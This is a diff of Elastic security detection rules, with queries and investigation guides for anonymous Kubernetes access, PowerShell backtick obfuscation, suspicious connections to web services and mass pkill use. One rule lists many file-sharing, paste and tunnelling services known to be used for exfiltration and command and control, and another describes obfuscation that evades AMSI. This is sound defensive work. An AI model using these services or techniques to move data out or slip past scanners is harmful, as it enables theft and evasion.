API server is a dangerous setting enabled by default. Common anonymous connections (e.g., health checks) have been excluded from this rule. All other instances of authorized anonymous requests should be investigated." - ], - "index": [ - "logs-kubernetes.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Kubernetes Anonymous Request Authorized", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Kubernetes Anonymous Request Authorized\n\nKubernetes, a container orchestration platform, manages workloads and services. It uses authentication to control access. Adversaries might exploit anonymous access to perform unauthorized actions without leaving traces. The detection rule identifies unauthorized access by monitoring audit logs for anonymous requests that are allowed, excluding common health check endpoints, to flag potential misuse.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.dataset:kubernetes.audit_logs to identify the context and details of the anonymous request.\n- Examine the kubernetes.audit.user.username field to confirm if the request was made by \"system:anonymous\" or \"system:unauthenticated\" and assess the potential risk associated with these accounts.\n- Analyze the kubernetes.audit.requestURI to determine the target of the request and verify if it is outside the excluded endpoints (/healthz, /livez, /readyz), which could indicate suspicious activity.\n- Investigate the source IP address and other network metadata associated with the request to identify the origin and assess if it aligns with known or expected traffic patterns.\n- Check for any subsequent or related activities in the audit logs that might indicate further unauthorized actions or attempts to exploit the cluster.\n\n### False positive analysis\n\n- Health check endpoints like /healthz, /livez, and /readyz are already excluded, but ensure any custom health check endpoints are also excluded to prevent false positives.\n- Regularly scheduled maintenance tasks or automated scripts that use anonymous access for legitimate purposes should be identified and excluded from the rule to avoid unnecessary alerts.\n- Some monitoring tools might use anonymous requests for gathering metrics; verify these tools and exclude their specific request patterns if they are known to be safe.\n- Development environments might have different access patterns compared to production; consider creating separate rules or exceptions for non-production clusters to reduce noise.\n- Review the audit logs to identify any recurring anonymous requests that are part of normal operations and adjust the rule to exclude these specific cases.\n\n### Response and remediation\n\n- Immediately isolate the affected Kubernetes cluster to prevent further unauthorized access and potential lateral movement by the adversary.\n- Revoke any anonymous access permissions that are not explicitly required for the operation of the cluster, ensuring that all access is authenticated and authorized.\n- Conduct a thorough review of the audit logs to identify any unauthorized actions performed by anonymous users and assess the impact on the cluster.\n- Reset credentials and access tokens for any accounts that may have been compromised or used in conjunction with the anonymous access.\n- Implement network segmentation to limit the exposure of the Kubernetes API server to only trusted networks and users.\n- Escalate the incident to the security operations team for further investigation and to determine if additional clusters or systems are affected.\n- Enhance monitoring and alerting for unauthorized access attempts, focusing on detecting and responding to similar threats in the future.", - "query": "event.dataset:kubernetes.audit_logs\n and kubernetes.audit.annotations.authorization_k8s_io/decision:allow\n and kubernetes.audit.user.username:(\"system:anonymous\" or \"system:unauthenticated\" or not *)\n and not kubernetes.audit.requestURI:(/healthz* or /livez* or /readyz*)\n", - "references": [ - "https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF" - ], - "related_integrations": [ - { - "package": "kubernetes", - "version": "^1.4.1" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.requestURI", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.user.username", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "63c057cc-339a-11ed-a261-0242ac120002", - "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Data Source: Kubernetes", - "Tactic: Execution", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.001", - "name": "Default Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 9 - }, - "id": "63c057cc-339a-11ed-a261-0242ac120002_9", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/64f17c52-6c6e-479e-ba72-236f3df18f3d_8.json b/packages/security_detection_engine/kibana/security_rule/64f17c52-6c6e-479e-ba72-236f3df18f3d_8.json deleted file mode 100644 index 25f7c270678..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/64f17c52-6c6e-479e-ba72-236f3df18f3d_8.json +++ /dev/null @@ -1,183 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use invalid escape sequences as a form of obfuscation. This technique introduces backticks (`) between characters in a way that does not correspond to valid PowerShell escape sequences, breaking up strings and bypassing pattern-based detections while preserving execution logic. This is designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via Invalid Escape Sequences", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Invalid Escape Sequences\n\nPowerShell, a powerful scripting language in Windows environments, can be exploited by adversaries using obfuscation techniques to evade detection. By inserting invalid escape sequences, attackers can obscure malicious scripts, bypassing static analysis and security tools like AMSI. The detection rule identifies such obfuscation by analyzing script patterns, specifically targeting unusual backtick usage, to flag potential threats.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the context and content of the script block that triggered the alert. Look for patterns of invalid escape sequences and assess whether they appear intentionally obfuscated.\n- Examine the `file.name` and `file.path` fields to determine the origin and location of the script. This can help identify whether the script is part of a legitimate application or potentially malicious.\n- Check the `host.name` and `agent.id` fields to identify the affected system and the agent responsible for logging the event. This information is crucial for understanding the scope of the potential threat.\n- Analyze the `user.id` field to ascertain which user executed the script. This can provide insights into whether the user has a history of executing suspicious scripts or if their account may be compromised.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` fields to trace the execution sequence and correlate it with other related script blocks, which may reveal additional obfuscation or malicious activity.\n- Assess the `count` field to evaluate the extent of obfuscation detected. A higher count may indicate more aggressive obfuscation techniques, warranting further scrutiny.\n\n### False positive analysis\n\n- Scripts from Visual Studio Code's PowerShell extension may trigger false positives due to its shell integration. To handle this, exclude scripts containing the pattern \"$([char]0x1b)]633\" from detection.\n- PowerShell modules with names starting with \"TSS_\" may be flagged incorrectly. Exclude these by adding a condition to ignore files matching the pattern \"TSS_*.psm1\".\n- Legitimate scripts that use backticks for formatting or other non-obfuscation purposes might be detected. Review such scripts and, if verified as safe, add them to an exception list based on their script block ID or file path.\n- Regularly update the exclusion list to reflect changes in legitimate script usage patterns, ensuring that new false positives are addressed promptly.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent lateral movement and further execution of potentially malicious scripts. Disconnect the host from the network and disable remote access.\n\n- Analyze the script block text and file path to identify the source and nature of the obfuscated script. Determine if the script is part of a larger attack or if other systems are affected.\n\n- Remove or quarantine the identified malicious script and any associated files from the host. Ensure that all remnants of the obfuscated code are eliminated to prevent re-execution.\n\n- Conduct a thorough scan of the host using updated antivirus and antimalware tools to detect and remove any additional threats or indicators of compromise.\n\n- Review and update PowerShell execution policies and security settings to restrict the execution of scripts with invalid escape sequences. Implement stricter controls to prevent similar obfuscation techniques.\n\n- Escalate the incident to the security operations center (SOC) or relevant cybersecurity team for further investigation and monitoring. Provide detailed logs and findings to assist in understanding the scope and impact of the threat.\n\n- Implement enhanced logging and monitoring for PowerShell activities across the network to detect and respond to similar obfuscation attempts promptly. Use the identified patterns to refine detection capabilities.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\" and powershell.file.script_block_text like \"*`*\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"[A-Za-z0-9_-]`(?![rntb]|\\r|\\n|\\d)[A-Za-z0-9_-]\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.name,\n file.directory,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least 20 times\n| where Esql.script_block_pattern_count >= 20\n\n| where file.name not like \"TSS_*.psm1\"\n // ESQL requires this condition, otherwise it only returns matches where file.name exists.\n or file.name is null\n\n// VSCode Shell integration\n| where not powershell.file.script_block_text like \"*$([char]0x1b)]633*\"\n\n| where not file.directory == \"C:\\\\Program Files\\\\MVPSI\\\\JAMS\\\\Agent\\\\Temp\"\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory is null\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.directory", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "64f17c52-6c6e-479e-ba72-236f3df18f3d", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 8 - }, - "id": "64f17c52-6c6e-479e-ba72-236f3df18f3d_8", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_127.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_127.json new file mode 100644 index 00000000000..2fea0f06522 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_127.json @@ -0,0 +1,160 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.network-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Commonly Abused Web Services", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/current/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and\n dns.question.name != null and process.name != null and\n not (?user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") or user.domain == \"NT AUTHORITY\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"pastebin.*\",\n \"paste4btc.com\",\n \"paste.ee\",\n \"ghostbin.com\",\n \"drive.google.com\",\n \"?.docs.live.net\",\n \"api.dropboxapi.*\",\n \"content.dropboxapi.*\",\n \"dl.dropboxusercontent.*\",\n \"api.onedrive.com\",\n \"*.onedrive.org\",\n \"onedrive.live.com\",\n \"filebin.net\",\n \"*.ngrok.io\",\n \"ngrok.com\",\n \"*.portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"slack.com\",\n \"api.slack.com\",\n \"slack-redir.net\",\n \"slack-files.com\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"apis.azureedge.net\",\n \"cdn.sql.gg\",\n \"?.top4top.io\",\n \"top4top.io\",\n \"www.uplooder.net\",\n \"*.cdnmegafiles.com\",\n \"transfer.sh\",\n \"gofile.io\",\n \"updates.peer2profit.com\",\n \"api.telegram.org\",\n \"t.me\",\n \"meacz.gq\",\n \"rwrd.org\",\n \"*.publicvm.com\",\n \"*.blogspot.com\",\n \"api.mylnikov.org\",\n \"file.io\",\n \"stackoverflow.com\",\n \"*files.1drv.com\",\n \"api.anonfile.com\",\n \"*hosting-profi.de\",\n \"ipbase.com\",\n \"ipfs.io\",\n \"*up.freeo*.space\",\n \"api.mylnikov.org\",\n \"script.google.com\",\n \"script.googleusercontent.com\",\n \"api.notion.com\",\n \"graph.microsoft.com\",\n \"*.sharepoint.com\",\n \"mbasic.facebook.com\",\n \"login.live.com\",\n \"api.gofile.io\",\n \"api.anonfiles.com\",\n \"api.notion.com\",\n \"api.trello.com\",\n \"gist.githubusercontent.com\",\n \"files.pythonhosted.org\",\n \"g.live.com\",\n \"*.zulipchat.com\",\n \"webhook.site\",\n \"run.mocky.io\",\n \"mockbin.org\", \n \"*googleapis.com\", \n \"global.rel.tunnels.api.visualstudio.com\",\n \"*.devtunnels.ms\",\n \"api.github.com\",\n \"*.blob.core.windows.net\",\n \"*.blob.storage.azure.net\",\n \"files.catbox.moe\",\n \"*.supabase.co\", \n \"*.elastic-cloud.com\",\n \"*.cloud.es.io\") and\n \n /* Insert noisy false positives here */\n not (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\BraveSoftware\\\\*\\\\Application\\\\brave.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera*\\\\opera.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\PowerToys\\\\PowerToys.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Zen Browser\\\\zen.exe\",\n \"?:\\\\Users\\\\*\\\\Wavesor Software\\\\WaveBrowser\\\\wavebrowser.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\", \n \"?:\\\\Windows\\\\system32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsl.exe\", \n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\"\n )\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint / OneDrive */\n (process.name : (\"Microsoft.SharePoint.exe\", \"OneDrive.Sync.Service.exe\") and dns.question.name : \"onedrive.live.com\" and\n (process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or \n\n /* Obsidian - Plugins are stored on raw.githubusercontent.com */\n (process.name : \"Obsidian.exe\" and (process.code_signature.subject_name : \"Dynalist Inc\" and\n process.code_signature.trusted == true) and dns.question.name : \"raw.githubusercontent.com\"\n ) or \n\n /* WebExperienceHostApp */\n (process.name : \"WebExperienceHostApp.exe\" and (process.code_signature.subject_name : \"Microsoft Windows\" and\n process.code_signature.trusted == true) and dns.question.name : (\"onedrive.live.com\", \"skyapi.onedrive.live.com\")\n ) or\n\n /* IntelliJ IDEA connecting to raw.githubusercontent.com */\n (process.code_signature.subject_name : \"JetBrains s.r.o.\" and\n process.code_signature.trusted == true and dns.question.name : (\"api.github.com\", \"raw.githubusercontent.com\")\n ) or \n\n (process.code_signature.subject_name : \"Microsoft *\" and process.code_signature.trusted == true and\n dns.question.name : (\"*.sharepoint.com\", \"graph.microsoft.com\", \"g.live.com\", \"login.live.com\",\n \"*.blob.core.windows.net\", \"*.blob.storage.azure.net\")\n ) or\n\n (process.code_signature.subject_name : (\"Python Software Foundation\", \"Anaconda, Inc.\") and\n process.code_signature.trusted == true and dns.question.name : \"files.pythonhosted.org\"\n ) or\n\n /* Zoom */\n (process.name : \"Zoom.exe\" and (\n process.code_signature.subject_name : (\"Zoom Video Communications, Inc.\", \"Zoom Communications, Inc.\") and\n process.code_signature.trusted == true) and dns.question.name : (\"www.googleapis.com\", \"graph.microsoft.com\")\n ) or\n\n /* VSCode */\n (process.name : \"Code.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : (\"api.github.com\", \"raw.githubusercontent.com\")\n ) or\n\n /* Terraform */\n (process.name : \"terraform-provider*.exe\" and (process.code_signature.subject_name : \"HashiCorp, Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : \"graph.microsoft.com\"\n ) or\n\n (\n process.code_signature.trusted == true and\n process.code_signature.subject_name : (\n \"Johannes Schindelin\",\n \"Redis Inc.\",\n \"Slack Technologies, LLC\",\n \"Cisco Systems, Inc.\",\n \"Dropbox, Inc\",\n \"Amazon.com Services LLC\", \n \"Island Technology Inc.\", \n \"GitHub, Inc.\", \n \"Red Hat, Inc\",\n \"Mozilla Corporation\"\n )\n )\n )\n", + "references": [ + "https://www.elastic.co/security-labs/operation-bleeding-bear", + "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry", + "https://specterops.io/blog/2026/01/30/weaponizing-whitelists-an-azure-blob-storage-mythic-c2-profile/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "66883649-f908-4a5b-a1e0-54090a1d3a32", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: SentinelOne" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1102", + "name": "Web Service", + "reference": "https://attack.mitre.org/techniques/T1102/" + }, + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + }, + { + "id": "T1090", + "name": "Proxy", + "reference": "https://attack.mitre.org/techniques/T1090/", + "subtechnique": [ + { + "id": "T1090.002", + "name": "External Proxy", + "reference": "https://attack.mitre.org/techniques/T1090/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/", + "subtechnique": [ + { + "id": "T1567.001", + "name": "Exfiltration to Code Repository", + "reference": "https://attack.mitre.org/techniques/T1567/001/" + }, + { + "id": "T1567.002", + "name": "Exfiltration to Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1567/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 127 + }, + "id": "66883649-f908-4a5b-a1e0-54090a1d3a32_127", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_114.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_114.json deleted file mode 100644 index 5bd6f588432..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_114.json +++ /dev/null @@ -1,101 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "High Number of Process Terminations", - "note": "## Triage and analysis\n\n### Investigating High Number of Process Terminations\n\nAttackers can kill processes for a variety of purposes. For example, they can kill process associated with business applications and databases to release the lock on files used by these applications so they may be encrypted,or stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of process terminations via pkill from the same host within a short time period.\n\n#### Possible investigation steps\n\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user.\n- Examine the contents of session leading to the process termination(s) via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities.\n- Examine the process killed during the malicious execution\n - Identify imment threat to the system from the process killed.\n - Take necessary incident response actions to respawn necessary process.\n\n### 